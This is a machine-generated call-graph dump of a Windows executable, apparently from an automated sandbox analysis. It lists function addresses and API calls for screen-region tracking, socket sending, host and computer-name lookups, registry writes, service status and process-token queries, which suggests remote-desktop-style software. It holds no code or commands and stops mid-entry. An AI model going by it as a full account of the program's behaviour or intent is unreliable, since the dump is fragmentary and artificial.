22073->22006 22074->21963 22075->21965 22076->21966 22077->22006 22078->21983 22080->22010 22082->22022 22084 7ff7400b7229 22083->22084 22085 7ff7400b7234 22084->22085 22086 7ff7400c29e4 RtlCaptureContext RtlLookupFunctionEntry 22084->22086 22085->22025 22087 7ff7400c2a69 22086->22087 22088 7ff7400c2a28 RtlVirtualUnwind 22086->22088 22089 7ff7400c2a8b IsDebuggerPresent 22087->22089 22088->22089 22234 7ff7400cdc94 22089->22234 22091 7ff7400c2aea SetUnhandledExceptionFilter UnhandledExceptionFilter 22092 7ff7400c2b12 GetCurrentProcess TerminateProcess 22091->22092 22093 7ff7400c2b08 _getdrive 22091->22093 22092->22025 22093->22092 22094->22044 22121 7ff740069ef0 22095->22121 22097 7ff74006a0d2 22097->22050 22099 7ff740069c46 22098->22099 22100 7ff740069c11 GetProcAddress GetProcAddress 22098->22100 22101 7ff740069c49 GetSystemMetrics 22099->22101 22100->22099 22102 7ff740069c40 22100->22102 22103 7ff740069c58 22101->22103 22104 7ff740069c80 CreateToolhelp32Snapshot 22101->22104 22102->22101 22103->22104 22105 7ff740069c61 GetCurrentProcessId ProcessIdToSessionId 22103->22105 22106 7ff740069cb7 22104->22106 22107 7ff740069c94 Process32First 22104->22107 22105->22104 22110 7ff740069cbc FreeLibrary 22106->22110 22111 7ff740069cc5 22106->22111 22108 7ff740069cae CloseHandle 22107->22108 22109 7ff740069cd0 22107->22109 22108->22106 22115 7ff740069d5a Process32Next 22109->22115 22116 7ff740069d0b CloseHandle 22109->22116 22117 7ff740069cf6 ProcessIdToSessionId 22109->22117 22162 7ff7400b9700 22109->22162 22110->22111 22113 7ff7400b7220 _getdrive 8 API calls 22111->22113 22114 7ff740069d38 22113->22114 22114->22056 22115->22109 22115->22116 22119 7ff740069d1d FreeLibrary 22116->22119 22120 7ff740069d26 22116->22120 22117->22109 22117->22115 22119->22120 22120->22111 22122 7ff740069f28 22121->22122 22133 7ff740069fdc 22121->22133 22124 7ff740069f30 GetProcessWindowStation 22122->22124 22122->22133 22123 7ff740069fec 22150 7ff740069d80 22123->22150 22125 7ff740069f47 GetUserObjectInformationA GetLastError SetLastError 22124->22125 22126 7ff740069f3b 22124->22126 22128 7ff740069fae 22125->22128 22129 7ff740069f79 RevertToSelf 22125->22129 22130 7ff740003730 _RunAllParam 89 API calls 22126->22130 22128->22133 22134 7ff740069fb7 22128->22134 22132 7ff740003730 _RunAllParam 89 API calls 22129->22132 22135 7ff74006a0a9 22130->22135 22138 7ff740069fa1 22132->22138 22133->22123 22133->22126 22139 7ff740003730 _RunAllParam 89 API calls 22134->22139 22135->22097 22136 7ff74006a06f 22140 7ff740003730 _RunAllParam 89 API calls 22136->22140 22137 7ff74006a000 GetUserNameA 22137->22136 22141 7ff74006a012 GetLastError 22137->22141 22138->22097 22144 7ff740069fcc 22139->22144 22145 7ff74006a087 22140->22145 22142 7ff74006a044 GetLastError 22141->22142 22143 7ff74006a01f 22141->22143 22147 7ff740003730 _RunAllParam 89 API calls 22142->22147 22146 7ff740003730 _RunAllParam 89 API calls 22143->22146 22144->22097 22145->22097 22148 7ff74006a034 22146->22148 22149 7ff74006a062 22147->22149 22148->22097 22149->22097 22151 7ff740069bc0 84 API calls 22150->22151 22152 7ff740069da3 22151->22152 22153 7ff740069dae OpenProcess OpenProcessToken 22152->22153 22160 7ff740069da7 22152->22160 22154 7ff740069de7 GetTokenInformation 22153->22154 22155 7ff740069de0 22153->22155 22157 7ff740069ea9 CloseHandle 22154->22157 22158 7ff740069e16 LookupAccountSidA CloseHandle CloseHandle 22154->22158 22156 7ff740069eb7 CloseHandle 22155->22156 22156->22160 22157->22156 22158->22160 22159 7ff7400b7220 _getdrive 8 API calls 22161 7ff740069eda 22159->22161 22160->22159 22161->22136 22161->22137 22163 7ff7400b9731 22162->22163 22164 7ff7400b970d 22162->22164 22164->22163 22169 7ff7400bffc8 22164->22169 22175 7ff7400c37c4 GetLastError FlsGetValue 22169->22175 22171 7ff7400b9717 22172 7ff7400c49d4 22171->22172 22225 7ff7400c4964 DecodePointer 22172->22225 22176 7ff7400c3832 SetLastError 22175->22176 22177 7ff7400c37ea 22175->22177 22176->22171 22187 7ff7400c32ec 22177->22187 22180 7ff7400c37ff FlsSetValue 22181 7ff7400c3815 22180->22181 22182 7ff7400c382b 22180->22182 22192 7ff7400c370c 22181->22192 22201 7ff7400b8bf4 22182->22201 22186 7ff7400c3830 22186->22176 22188 7ff7400c3311 22187->22188 22190 7ff7400c3351 22188->22190 22191 7ff7400c332f Sleep 22188->22191 22207 7ff7400c9234 22188->22207 22190->22176 22190->22180 22191->22188 22191->22190 22217 7ff7400c77d0 22192->22217 22194 7ff7400c3765 22195 7ff7400c76d0 _isindst LeaveCriticalSection 22194->22195 22196 7ff7400c377a 22195->22196 22197 7ff7400c77d0 _lock 70 API calls 22196->22197 22198 7ff7400c3784 _errno 22197->22198 22199 7ff7400c76d0 _isindst LeaveCriticalSection 22198->22199 22200 7ff7400c37b6 GetCurrentThreadId 22199->22200 22200->22176 22202 7ff7400b8c29 free 22201->22202 22203 7ff7400b8bf9 RtlFreeHeap 22201->22203 22202->22186 22203->22202 22204 7ff7400b8c14 22203->22204 22205 7ff7400bffc8 _errno 68 API calls 22204->22205 22206 7ff7400b8c19 GetLastError 22205->22206 22206->22202 22208 7ff7400c9249 22207->22208 22213 7ff7400c9266 22207->22213 22209 7ff7400c9257 22208->22209 22208->22213 22210 7ff7400bffc8 _errno 69 API calls 22209->22210 22212 7ff7400c925c 22210->22212 22211 7ff7400c927e HeapAlloc 22211->22212 22211->22213 22212->22188 22213->22211 22213->22212 22215 7ff7400c3238 DecodePointer 22213->22215 22216 7ff7400c3253 22215->22216 22216->22213 22218 7ff7400c77ff EnterCriticalSection 22217->22218 22219 7ff7400c77ee 22217->22219 22223 7ff7400c76e8 70 API calls 6 library calls 22219->22223 22221 7ff7400c77f3 22221->22218 22224 7ff7400baf34 70 API calls 6 library calls 22221->22224 22223->22221 22224->22218 22226 7ff7400b9722 22225->22226 22227 7ff7400c49c3 22225->22227 22226->22109 22232 7ff7400c4930 16 API calls __tzset 22227->22232 22233->22068 22234->22091 23145 7ff740003770 111 API calls 2 library calls 23146 7ff740012b5e 87 API calls 23147 7ff74000d560 19 API calls 2 library calls 23148 7ff740010760 95 API calls free 23149 7ff740018190 125 API calls _RunAllParam 23151 7ff74000d790 11 API calls _getdrive 23152 7ff740029390 121 API calls _RunAllParam 23154 7ff74002f790 96 API calls 2 library calls 23156 7ff740024003 232 API calls 2 library calls 23157 7ff740004790 DeleteCriticalSection 23158 7ff74001bb80 122 API calls 2 library calls 23159 7ff74001dd80 121 API calls 23160 7ff74000cf80 120 API calls 4 library calls 23161 7ff74000f780 71 API calls __wtomb_environ 23162 7ff74002e780 97 API calls __wtomb_environ 23164 7ff7400081ad 272 API calls 2 library calls 23165 7ff7400205b0 168 API calls _RunAllParam 23167 7ff74000ffb0 SetRectRgn SetRectRgn SetRectRgn 23168 7ff74002a9b0 114 API calls _getdrive 23169 7ff74002ebb0 71 API calls 23171 7ff740024003 266 API calls 3 library calls 23172 7ff740019ba0 SetEvent Sleep Sleep 23174 7ff7400313a0 7 API calls 23175 7ff7400055c0 LeaveCriticalSection 23176 7ff7400047c0 12 API calls 22610 7ff74001f7d0 22611 7ff74001f80d 22610->22611 22612 7ff74001f803 22610->22612 22619 7ff740097a70 22611->22619 22616 7ff7400284f0 22612->22616 22630 7ff740028590 22616->22630 22624 7ff740097a8a 22619->22624 22620 7ff740097ae5 CloseHandle 22621 7ff740097aef GetLastError 22620->22621 22627 7ff740097b0a 22620->22627 22625 7ff7400c2950 RaiseException 22621->22625 22622 7ff740097b17 CloseHandle 22623 7ff740097b3d DeleteCriticalSection 22622->22623 22626 7ff740097b21 GetLastError 22622->22626 22624->22620 22624->22627 22625->22627 22628 7ff7400c2950 RaiseException 22626->22628 22627->22622 22627->22623 22629 7ff740097b3c 22628->22629 22629->22623 22631 7ff740003730 _RunAllParam 89 API calls 22630->22631 22632 7ff7400285d2 22631->22632 22633 7ff7400285eb SendMessageA WaitForSingleObject 22632->22633 22634 7ff740028628 22632->22634 22635 7ff740028612 22632->22635 22633->22635 22636 7ff740028656 22634->22636 22637 7ff7400b8bf4 free 70 API calls 22634->22637 22635->22634 22660 7ff740014110 22635->22660 22638 7ff740003730 _RunAllParam 89 API calls 22636->22638 22648 7ff74002867e _RunAllParam 22636->22648 22637->22636 22638->22648 22639 7ff740028757 22640 7ff740028768 22639->22640 22641 7ff7400b8bf4 free 70 API calls 22639->22641 22642 7ff740028779 22640->22642 22643 7ff7400b8bf4 free 70 API calls 22640->22643 22641->22640 22646 7ff7400287b5 FreeLibrary 22642->22646 22650 7ff7400287bc _RunAllParam 22642->22650 22643->22642 22645 7ff74002873b 22645->22639 22647 7ff740028740 SendMessageA 22645->22647 22646->22650 22647->22639 22648->22639 22663 7ff74006a220 FindWindowExA GetWindowThreadProcessId GetCurrentProcessId 22648->22663 22649 7ff7400287ea DeleteObject 22651 7ff7400b8bf4 free 70 API calls 22649->22651 22650->22649 22652 7ff74002881c DeleteObject 22651->22652 22653 7ff7400b8bf4 free 70 API calls 22652->22653 22654 7ff740028844 DeleteObject 22653->22654 22655 7ff7400b8bf4 free 70 API calls 22654->22655 22656 7ff74002885d DeleteObject 22655->22656 22657 7ff7400b8bf4 free 70 API calls 22656->22657 22658 7ff740028876 22657->22658 22664 7ff740014140 22660->22664 22662 7ff740014124 22662->22634 22663->22645 22665 7ff74001415c _RunAllParam 22664->22665 22666 7ff7400141b4 SendMessageA 22665->22666 22667 7ff7400141c6 22665->22667 22666->22667 22668 7ff7400141cf FreeLibrary 22667->22668 22669 7ff7400141d5 22667->22669 22668->22669 22669->22662 23177 7ff74001b3d0 96 API calls 2 library calls 23179 7ff740011bd0 FreeLibrary 23180 7ff74000f7d0 DeleteObject 23181 7ff740024003 229 API calls 2 library calls 23182 7ff740057bd0 21 API calls _getdrive 23183 7ff740024003 220 API calls 2 library calls 23184 7ff740024003 247 API calls 3 library calls 23185 7ff7400055d0 72 API calls sprintf 23186 7ff740024003 261 API calls 2 library calls 23191 7ff7400be9bc 81 API calls 3 library calls 23093 7ff74006cbc0 23094 7ff74006cbdc socket 23093->23094 23095 7ff74006cbd7 23093->23095 23097 7ff74006cbfb setsockopt 23094->23097 23098 7ff74006cbf3 23094->23098 23102 7ff74006cc40 23095->23102 23097->23098 23099 7ff74006cc20 23097->23099 23100 7ff74006cf90 14 API calls 23099->23100 23101 7ff74006cc28 23100->23101 23103 7ff74006cc87 23102->23103 23104 7ff74006cc4f 23102->23104 23103->23094 23105 7ff740003730 _RunAllParam 89 API calls 23104->23105 23106 7ff74006cc67 shutdown closesocket 23105->23106 23106->23103 23194 7ff7400103f0 CombineRgn 23195 7ff74002dbf0 13 API calls _RunAllParam 23196 7ff74002ebf0 141 API calls 2 library calls 23198 7ff7400065f1 8 API calls _getdrive 23199 7ff74001dde0 152 API calls 23200 7ff7400109e0 82 API calls 2 library calls 23201 7ff740013be0 RegCreateKeyExA RegOpenKeyExA RegSetValueExA RegCloseKey RegCloseKey 23202 7ff7400289e0 93 API calls _RunAllParam 23203 7ff7400079e9 75 API calls 3 library calls 23204 7ff740004200 121 API calls 2 library calls 23206 7ff740001000 70 API calls free 22670 7ff74001e610 22671 7ff7400b92a4 __wtomb_environ 70 API calls 22670->22671 22672 7ff74001e67f CreateRectRgn 22671->22672 22673 7ff7400b92a4 __wtomb_environ 70 API calls 22672->22673 22674 7ff74001e6a3 CreateRectRgn 22673->22674 22675 7ff7400b92a4 __wtomb_environ 70 API calls 22674->22675 22676 7ff74001e6c7 CreateRectRgn 22675->22676 22677 7ff740003730 _RunAllParam 89 API calls 22676->22677 22714 7ff74001e70a _RunAllParam 22677->22714 22678 7ff74001f70d 22679 7ff740003730 _RunAllParam 89 API calls 22678->22679 22680 7ff74001f725 22679->22680 22683 7ff740003730 _RunAllParam 89 API calls 22680->22683 22681 7ff74001e740 Sleep 22682 7ff74001e752 22681->22682 22682->22681 22682->22714 22722 7ff74001f6b8 SetRectRgn 22682->22722 22727 7ff74001f6da LeaveCriticalSection Sleep 22682->22727 22684 7ff74001f741 DeleteObject 22683->22684 22686 7ff7400b8bf4 free 70 API calls 22684->22686 22685 7ff74001e773 EnterCriticalSection 22685->22714 22687 7ff74001f760 DeleteObject 22686->22687 22688 7ff7400b8bf4 free 70 API calls 22687->22688 22689 7ff74001f773 DeleteObject 22688->22689 22691 7ff7400b8bf4 free 70 API calls 22689->22691 22690 7ff74001eab4 DeleteObject 22692 7ff7400b8bf4 free 70 API calls 22690->22692 22698 7ff74001f786 22691->22698 22692->22714 22693 7ff74001ead7 DeleteObject 22699 7ff7400b8bf4 free 70 API calls 22693->22699 22694 7ff74001e8cb DeleteObject 22700 7ff7400b8bf4 free 70 API calls 22694->22700 22695 7ff74001eafa DeleteObject 22701 7ff7400b8bf4 free 70 API calls 22695->22701 22696 7ff74001e8ee DeleteObject 22702 7ff7400b8bf4 free 70 API calls 22696->22702 22705 7ff7400b7220 _getdrive 8 API calls 22698->22705 22699->22714 22700->22714 22701->22714 22702->22714 22703 7ff74001e9a6 GetRgnBox 22703->22714 22704 7ff74001e911 DeleteObject 22707 7ff7400b8bf4 free 70 API calls 22704->22707 22708 7ff74001f7a2 22705->22708 22707->22714 22709 7ff74001e7e6 GetRgnBox 22709->22714 22710 7ff74001f704 LeaveCriticalSection 22710->22678 22711 7ff7400975c0 104 API calls 22711->22714 22713 7ff740097400 97 API calls 22713->22714 22714->22678 22714->22681 22714->22682 22714->22685 22714->22690 22714->22693 22714->22694 22714->22695 22714->22696 22714->22704 22714->22710 22714->22711 22714->22713 22718 7ff74006d440 16 API calls 22714->22718 22719 7ff7400b92a4 __wtomb_environ 70 API calls 22714->22719 22714->22722 22728 7ff7400b92a4 __wtomb_environ 70 API calls 22714->22728 22732 7ff74001f60b GetTickCount 22714->22732 22734 7ff7400b92a4 __wtomb_environ 70 API calls 22714->22734 22739 7ff74006d710 15 API calls 22714->22739 22744 7ff740003730 89 API calls _RunAllParam 22714->22744 22746 7ff74006cc40 91 API calls 22714->22746 22747 7ff74000f840 73 API calls __wtomb_environ 22714->22747 22748 7ff74000f840 73 API calls __wtomb_environ 22714->22748 22749 7ff74000f840 73 API calls __wtomb_environ 22714->22749 22750 7ff74000f840 73 API calls __wtomb_environ 22714->22750 22751 7ff74000f840 73 API calls __wtomb_environ 22714->22751 22752 7ff74000f840 73 API calls __wtomb_environ 22714->22752 22754 7ff74006d600 14 API calls 22714->22754 22763 7ff74006ded0 8 API calls 2 library calls 22714->22763 22764 7ff74002a580 99 API calls _RunAllParam 22714->22764 22716 7ff74001e9f3 GetRgnBox 22716->22714 22717 7ff74001e833 GetRgnBox 22717->22714 22718->22714 22724 7ff74001ebb3 CreateRectRgn CombineRgn 22719->22724 22722->22727 22730 7ff74001ec05 22724->22730 22725 7ff74001ea40 GetRgnBox 22725->22714 22726 7ff74001e87c GetRgnBox 22726->22714 22727->22714 22729 7ff74001f702 22727->22729 22733 7ff74001efdf CreateRectRgn CombineRgn DeleteObject 22728->22733 22729->22678 22731 7ff74001ec20 SetEvent 22730->22731 22753 7ff740028e00 120 API calls 22730->22753 22731->22730 22755 7ff74006dd90 22732->22755 22737 7ff7400b8bf4 free 70 API calls 22733->22737 22738 7ff74001f120 CreateRectRgn CombineRgn DeleteObject 22734->22738 22737->22714 22742 7ff7400b8bf4 free 70 API calls 22738->22742 22739->22714 22740 7ff74001ec4a DeleteObject 22743 7ff7400b8bf4 free 70 API calls 22740->22743 22742->22714 22743->22714 22744->22714 22746->22714 22747->22709 22748->22717 22749->22726 22750->22703 22751->22716 22752->22725 22753->22740 22754->22714 22756 7ff74006de3d 22755->22756 22760 7ff74006ddd4 22755->22760 22757 7ff7400b7220 _getdrive 8 API calls 22756->22757 22759 7ff74006dea6 22757->22759 22758 7ff74006ddf0 select 22758->22760 22759->22682 22760->22756 22760->22758 22761 7ff74006de55 __WSAFDIsSet 22760->22761 22761->22760 22762 7ff74006de67 send 22761->22762 22762->22760 22763->22714 22764->22714 23207 7ff74001da10 82 API calls 2 library calls 23208 7ff740013210 18 API calls _getdrive 23210 7ff740014c10 137 API calls 3 library calls 23211 7ff740010010 74 API calls free 23214 7ff740057e10 20 API calls _getdrive 23221 7ff74000a600 100 API calls _RunAllParam 23222 7ff740010e00 82 API calls 3 library calls 23224 7ff740033600 9 API calls _getdrive 23225 7ff740035000 71 API calls free 23226 7ff740015203 16 API calls _getdrive 23228 7ff7400bc034 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 23231 7ff74000a830 91 API calls 2 library calls 23233 7ff740033430 201 API calls 23235 7ff740024003 244 API calls 3 library calls 23236 7ff740021620 150 API calls 5 library calls 23238 7ff74000d820 8 API calls _RunAllParam 23239 7ff74002a420 15 API calls _getdrive 23241 7ff740012a50 SetServiceStatus 23244 7ff740024003 230 API calls 2 library calls 23245 7ff740024003 262 API calls 3 library calls 23246 7ff740001450 RaiseException 23248 7ff740031440 126 API calls _RunAllParam 23249 7ff740035040 SetRectRgn CombineRgn DeleteObject 23250 7ff740024003 258 API calls 2 library calls 23251 7ff740005a60 25 API calls 2 library calls 23253 7ff740003e60 34 API calls 23254 7ff740006060 112 API calls 2 library calls 23255 7ff740012a6e SetServiceStatus SetEvent SetEvent 23260 7ff740028a70 133 API calls 4 library calls 23263 7ff740001a70 CloseClipboard 23264 7ff740035a60 8 API calls 23266 7ff740033460 122 API calls 2 library calls 23267 7ff740029060 129 API calls 23269 7ff74001a890 97 API calls 2 library calls 23274 7ff740012880 196 API calls 23275 7ff74000d880 6 API calls _RunAllParam 23276 7ff740029480 117 API calls _RunAllParam 23277 7ff740065e80 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 23278 7ff74002a085 98 API calls 23283 7ff740013cb0 RegCreateKeyExA RegOpenKeyExA RegDeleteValueA RegCloseKey RegCloseKey 23284 7ff7400134b0 13 API calls _getdrive 23286 7ff74000a6b0 93 API calls 2 library calls 23291 7ff74001cca0 115 API calls 23013 7ff7400288a0 getpeername inet_ntoa 23014 7ff7400b92a4 __wtomb_environ 70 API calls 23013->23014 23015 7ff740028913 23014->23015 23016 7ff7400b7978 81 API calls 23015->23016 23017 7ff740028930 23016->23017 23018 7ff74002893d InitializeCriticalSection 23017->23018 23020 7ff74002895e 23017->23020 23029 7ff7400979a0 EnterCriticalSection LeaveCriticalSection CreateSemaphoreA GetLastError RaiseException 23018->23029 23021 7ff740028988 23020->23021 23025 7ff74001f840 23020->23025 23022 7ff7400b7220 _getdrive 8 API calls 23021->23022 23023 7ff7400289c3 23022->23023 23026 7ff74001f885 23025->23026 23030 7ff740097b50 EnterCriticalSection 23026->23030 23028 7ff74001f926 23028->23021 23029->23020 23031 7ff740097b84 23030->23031 23032 7ff740097b6d 23030->23032 23050 7ff7400c285c 23031->23050 23033 7ff7400c2950 RaiseException 23032->23033 23033->23031 23036 7ff740097bc9 GetLastError 23037 7ff7400c2950 RaiseException 23036->23037 23039 7ff740097be4 23037->23039 23038 7ff740097c18 SetThreadPriority 23040 7ff740097c43 ResumeThread 23038->23040 23041 7ff740097c27 GetLastError 23038->23041 23039->23038 23044 7ff7400c2950 RaiseException 23039->23044 23047 7ff740097c0b 23039->23047 23042 7ff740097c52 GetLastError 23040->23042 23043 7ff740097c6e LeaveCriticalSection 23040->23043 23045 7ff7400c2950 RaiseException 23041->23045 23046 7ff7400c2950 RaiseException 23042->23046 23043->23028 23044->23047 23048 7ff740097c42 23045->23048 23049 7ff740097c6d 23046->23049 23047->23038 23048->23040 23049->23043 23051 7ff7400c2887 23050->23051 23052 7ff7400c289c 23050->23052 23053 7ff7400bffc8 _errno 70 API calls 23051->23053 23056 7ff7400c32ec __wtomb_environ 70 API calls 23052->23056 23054 7ff7400c288c 23053->23054 23055 7ff7400c49d4 _invalid_parameter_noinfo 17 API calls 23054->23055 23057 7ff740097bb9 23055->23057 23058 7ff7400c28b0 23056->23058 23057->23036 23057->23039 23059 7ff7400c2920 23058->23059 23068 7ff7400c3848 23058->23068 23061 7ff7400b8bf4 free 70 API calls 23059->23061 23063 7ff7400c2928 23061->23063 23063->23057 23073 7ff7400c0008 70 API calls 2 library calls 23063->23073 23064 7ff7400c370c _errno 70 API calls 23065 7ff7400c28cc CreateThread 23064->23065 23065->23057 23067 7ff7400c2918 GetLastError 23065->23067 23067->23059 23069 7ff7400c37c4 _errno 70 API calls 23068->23069 23070 7ff7400c3853 23069->23070 23071 7ff7400c28bd 23070->23071 23074 7ff7400baf34 70 API calls 6 library calls 23070->23074 23071->23064 23073->23057 23074->23071 23293 7ff7400354a0 109 API calls 4 library calls 23294 7ff740035ca0 331 API calls 4 library calls 23296 7ff740083ca0 75 API calls 3 library calls 22765 7ff7400236d0 SetErrorMode 22766 7ff740023734 22765->22766 22767 7ff740003730 _RunAllParam 89 API calls 22766->22767 22768 7ff740023764 GetCurrentThreadId GetThreadDesktop 22767->22768 22769 7ff740023799 22768->22769 22889 7ff7400233a0 22769->22889 22770 7ff7400237b4 22807 7ff7400239df 22770->22807 22901 7ff74001f940 22770->22901 22772 7ff7400239ea 22773 7ff740003730 _RunAllParam 89 API calls 22772->22773 22781 7ff740023a11 22773->22781 22774 7ff7400b7220 _getdrive 8 API calls 22775 7ff740027ff0 22774->22775 22776 7ff7400237ce 22917 7ff7400b851c 22776->22917 22778 7ff740023825 22779 7ff7400b92a4 __wtomb_environ 70 API calls 22778->22779 22780 7ff740023838 22779->22780 22782 7ff7400b92a4 __wtomb_environ 70 API calls 22780->22782 22784 7ff740027ef3 22781->22784 22938 7ff74006d170 22781->22938 22783 7ff740023842 22782->22783 22923 7ff74006a320 22783->22923 22788 7ff740003730 _RunAllParam 89 API calls 22784->22788 22784->22807 22801 7ff740027f3e 22788->22801 22789 7ff740023a76 22791 7ff740003730 _RunAllParam 89 API calls 22789->22791 22790 7ff740023867 22794 7ff7400b8bf4 free 70 API calls 22790->22794 22795 7ff740023874 22790->22795 22793 7ff740023a8e timeGetTime 22791->22793 22792 7ff7400b8bf4 free 70 API calls 22792->22790 22796 7ff740023aaf 22793->22796 22794->22795 22797 7ff740023905 22795->22797 22799 7ff7400238d0 SleepEx 22795->22799 22795->22807 22942 7ff740065f30 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 22796->22942 22802 7ff740003730 _RunAllParam 89 API calls 22797->22802 22799->22795 22799->22807 22800 7ff740023abc 22803 7ff740023ac0 EnterCriticalSection 22800->22803 22806 7ff740023b17 _snprintf 22800->22806 22949 7ff74006ab00 95 API calls _RunAllParam 22801->22949 22816 7ff740023947 22802->22816 22809 7ff740023af7 22803->22809 22808 7ff740023bd1 GetComputerNameA 22806->22808 22807->22774 22811 7ff740023c52 22808->22811 22818 7ff740023bec 22808->22818 22943 7ff74001aed0 89 API calls _snprintf 22809->22943 22813 7ff740023c83 gethostname 22811->22813 22821 7ff740023c57 22811->22821 22812 7ff740023b0d LeaveCriticalSection 22812->22806 22814 7ff740023caf 22813->22814 22813->22821 22945 7ff740023220 71 API calls 2 library calls 22814->22945 22928 7ff74006a290 22816->22928 22944 7ff7400b8e5c 70 API calls 4 library calls 22818->22944 22820 7ff7400239c2 22820->22807 22823 7ff740003730 _RunAllParam 89 API calls 22820->22823 22946 7ff74006d710 15 API calls 22821->22946 22823->22807 22824 7ff740023ec4 22824->22807 22947 7ff74006d600 14 API calls 22824->22947 22826 7ff740023eed 22826->22807 22827 7ff740003730 _RunAllParam 89 API calls 22826->22827 22828 7ff740023f0d EnterCriticalSection 22827->22828 22830 7ff7400b92a4 __wtomb_environ 70 API calls 22828->22830 22831 7ff740023f5f CreateRectRgn 22830->22831 22832 7ff740023f95 DeleteObject 22831->22832 22833 7ff7400b8bf4 free 70 API calls 22832->22833 22834 7ff740023faa LeaveCriticalSection 22833->22834 22948 7ff740097d90 EnterCriticalSection SetThreadPriority GetLastError LeaveCriticalSection RaiseException 22834->22948 22890 7ff7400233c1 22889->22890 22891 7ff74006d170 2 API calls 22890->22891 22892 7ff7400233cf 22891->22892 22893 7ff7400233d3 GetLastError 22892->22893 22895 7ff7400233f1 22892->22895 22894 7ff740003730 _RunAllParam 89 API calls 22893->22894 22894->22895 22898 7ff740003730 _RunAllParam 89 API calls 22895->22898 22899 7ff740023441 22895->22899 22896 7ff740003730 _RunAllParam 89 API calls 22897 7ff74002351a 22896->22897 22897->22770 22898->22899 22899->22896 22900 7ff74002349e 22899->22900 22900->22770 22904 7ff74001f980 22901->22904 22903 7ff74001fb49 22907 7ff7400b7220 _getdrive 8 API calls 22903->22907 22904->22903 22905 7ff74001fae6 SleepEx 22904->22905 22906 7ff74001fb50 22904->22906 22910 7ff74001fa11 22904->22910 22912 7ff74001fa5e EnterCriticalSection 22904->22912 22950 7ff7400b7c50 22904->22950 22956 7ff74006d1f0 GetTickCount 22904->22956 22905->22904 22906->22903 22965 7ff7400b8bbc 70 API calls swscanf 22906->22965 22909 7ff74001fc50 22907->22909 22909->22772 22909->22776 22910->22904 22910->22905 22964 7ff74006d890 97 API calls _RunAllParam 22910->22964 22915 7ff74001fa91 LeaveCriticalSection 22912->22915 22914 7ff74001fb8c 22914->22903 22916 7ff740003730 _RunAllParam 89 API calls 22914->22916 22915->22904 22916->22903 22919 7ff7400b854e _snprintf 22917->22919 22918 7ff7400bffc8 _errno 70 API calls 22920 7ff7400b8558 22918->22920 22919->22918 22922 7ff7400b8563 22919->22922 22921 7ff7400c49d4 _invalid_parameter_noinfo 17 API calls 22920->22921 22921->22922 22922->22778 22924 7ff74006a340 FindWindowExA 22923->22924 22925 7ff74006a35d GetWindowThreadProcessId GetCurrentProcessId 22924->22925 22926 7ff740023856 22924->22926 22925->22924 22927 7ff74006a37c PostMessageA 22925->22927 22926->22790 22926->22792 22926->22795 22927->22926 22929 7ff74006a303 22928->22929 22930 7ff74006a2b0 22928->22930 22932 7ff74006a340 FindWindowExA 22929->22932 22930->22929 22931 7ff74006a2b9 FindWindowA 22930->22931 22933 7ff74006a2dd PostMessageA 22931->22933 22934 7ff74006a2cd 22931->22934 22935 7ff74006a35d GetWindowThreadProcessId GetCurrentProcessId 22932->22935 22936 7ff74006a392 22932->22936 22933->22820 22934->22820 22935->22932 22937 7ff74006a37c PostMessageA 22935->22937 22936->22820 22937->22936 22939 7ff74006d18a setsockopt 22938->22939 22940 7ff74006d182 22938->22940 22939->22940 22941 7ff74006d1b5 setsockopt 22939->22941 22940->22789 22941->22789 22942->22800 22943->22812 22944->22811 22945->22821 22946->22824 22947->22826 22949->22807 22951 7ff7400b7c83 _snprintf 22950->22951 22952 7ff7400bffc8 _errno 70 API calls 22951->22952 22955 7ff7400b7c98 22951->22955 22953 7ff7400b7c8d 22952->22953 22954 7ff7400c49d4 _invalid_parameter_noinfo 17 API calls 22953->22954 22954->22955 22955->22904 22957 7ff74006d22f 22956->22957 22958 7ff74006d2b6 22956->22958 22959 7ff74006dd90 11 API calls 22957->22959 22960 7ff74006dd90 11 API calls 22958->22960 22961 7ff74006d25f 22958->22961 22963 7ff74006d25b 22959->22963 22960->22961 22961->22904 22962 7ff74006dd90 11 API calls 22962->22963 22963->22958 22963->22961 22963->22962 22964->22910 22965->22914 23299 7ff7400100d0 88 API calls 2 library calls 23300 7ff740028ed0 127 API calls _getdrive 23303 7ff7400028d0 81 API calls 23305 7ff7400222c0 114 API calls 5 library calls 23307 7ff740017ac0 10 API calls _RunAllParam 23309 7ff7400292c0 119 API calls _RunAllParam 23311 7ff74002f8c0 72 API calls _getdrive 23314 7ff7400056e0 DeleteCriticalSection DeleteCriticalSection FreeLibrary DeleteFileA 23315 7ff74001a6f0 GetWindowLongPtrA SetWindowLongPtrA SetDlgItemTextA SetForegroundWindow EndDialog 23317 7ff74002f6f0 10 API calls _getdrive 23318 7ff7400290f0 EnterCriticalSection LeaveCriticalSection 23319 7ff74002d0f0 DialogBoxParamA 22235 7ff7400280da 22254 7ff740010270 22235->22254 22237 7ff7400281c6 22261 7ff7400b92a4 22237->22261 22241 7ff740028211 LoadLibraryA 22242 7ff740028247 GetProcAddress 22241->22242 22243 7ff74002825e 22241->22243 22242->22243 22244 7ff740003730 _RunAllParam 89 API calls 22243->22244 22245 7ff74002828f 22244->22245 22246 7ff740003730 _RunAllParam 89 API calls 22245->22246 22247 7ff7400282f7 22246->22247 22273 7ff7400b7978 22247->22273 22250 7ff7400b7978 81 API calls 22251 7ff740028454 22250->22251 22252 7ff740028469 22251->22252 22285 7ff740013fb0 22251->22285 22255 7ff7400b92a4 __wtomb_environ 70 API calls 22254->22255 22256 7ff74001028f CreateRectRgn 22255->22256 22257 7ff7400b92a4 __wtomb_environ 70 API calls 22256->22257 22258 7ff7400102b3 CreateRectRgn 22257->22258 22259 7ff7400b92a4 __wtomb_environ 70 API calls 22258->22259 22260 7ff7400102d7 CreateRectRgn 22259->22260 22260->22237 22262 7ff7400b92bb std::exception::operator= 22261->22262 22267 7ff7400281e7 CreateRectRgn 22261->22267 22293 7ff7400b8c34 22262->22293 22266 7ff7400b92e3 22266->22267 22268 7ff7400b92ec 22266->22268 22271 7ff7400021e0 22267->22271 22311 7ff7400c4930 16 API calls __tzset 22268->22311 22272 7ff740002259 22271->22272 22272->22241 22275 7ff7400b7983 22273->22275 22274 7ff7400b8c34 malloc 70 API calls 22274->22275 22275->22274 22276 7ff74002831e 22275->22276 22277 7ff7400c3238 _callnewh DecodePointer 22275->22277 22281 7ff7400b79a2 22275->22281 22276->22250 22277->22275 22278 7ff7400b79f3 22316 7ff7400b755c 70 API calls std::exception::operator= 22278->22316 22280 